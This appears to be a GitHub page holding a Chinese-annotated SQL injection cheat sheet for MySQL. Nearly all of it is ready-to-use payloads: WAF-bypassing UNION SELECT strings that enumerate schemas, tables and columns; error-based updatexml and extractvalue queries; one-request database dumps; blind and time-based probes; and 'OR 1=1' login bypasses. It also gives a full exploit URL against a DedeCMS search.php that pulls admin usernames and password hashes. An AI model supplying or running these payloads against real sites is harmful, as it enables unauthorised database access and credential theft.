-
Notifications
You must be signed in to change notification settings - Fork 6
/
sql_injection语句
72 lines (44 loc) · 4.5 KB
/
sql_injection语句
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
爆出数据表名:
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@;=export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
/*!00008UniOn*/+/*!00008sEleCT*/+0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129
-EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x31,0x32,0x3c68313e494853414e2053454e43414e3c2f68313e,(/*!00009Select*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_name*/,0xa3a,2)),@,2))
-2'+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10-- -
-2'+/*!50000union*/+select+1,/*!50000concat*/(username,0x3a,adminpassword),3,4,0x496873616e2053656e63616e207777772e696873616e2e6e6574,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+from+admin-- -
select SCHEMA_NAME from information_schema.SCHEMATA limit 5,1/* 5,1表示从第1个开始,数到第5个
然后就是爆表了。
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0×6D656D626572 limit 5,1/*TABLE_SCHEMA=后面是库名的16进制
再来爆字段
select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0×61646D5F75736572 limit 5,1/*
-3061'++/*!00004UNION*/+/*!00004SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,(/*!00004Select*/+export_set(5,@:=0,(/*!00004select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00004table_name*/,0x3c6c693e,2),/*!
00004column_name*/,0xa3a,2)),@,2)),0x496873616e2053656e63616e,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137--+-
/*!30000union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 10,1)
冷门函数/标签绕过:
(updatexml(1,concat(0x3a,(select user())),1))
extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x))
(/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)
dede爆账号密码:
http://126zzz.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
[DUMP DB in 1 Request]
PHP Code:
( select (@) from ( select(@:= 0x00 ),
( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat(@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
( select(@) from ( select (@:= 0x00 )
( select (@) from ( table ) where (@) in (@:= concat(@, 0x0a , column1 , 0x3a , column2 )))) a )
[DUMP DB in 1 Request improve]
PHP Code:
( select(@ x ) from (select (@x := 0x00 )
(select( 0 ) from( information_schema . columns) where( table_schema != 0x696e666f726d6174696f6e5f736368656d61 )and( 0x00 ) in(@ x := concat(@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
Manual MYSQL INJECTION Queries
-----------------------------
|
-> Normal Blind Sql Injection
UNION ALL SELECT NULL,(SELECT CONCAT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM information_schema.schemata LIMIT x,x),NULL,NULL--+
Time-Based SQL Injection
AND IF(SUBSTRING(version(),1,1)=CHAR(666), sleep(2), 'false')--+
Login using whatever username:
admin' OR 1=1-- -
james' OR 1=1-- -
jessica' OR 1=1-- -
.....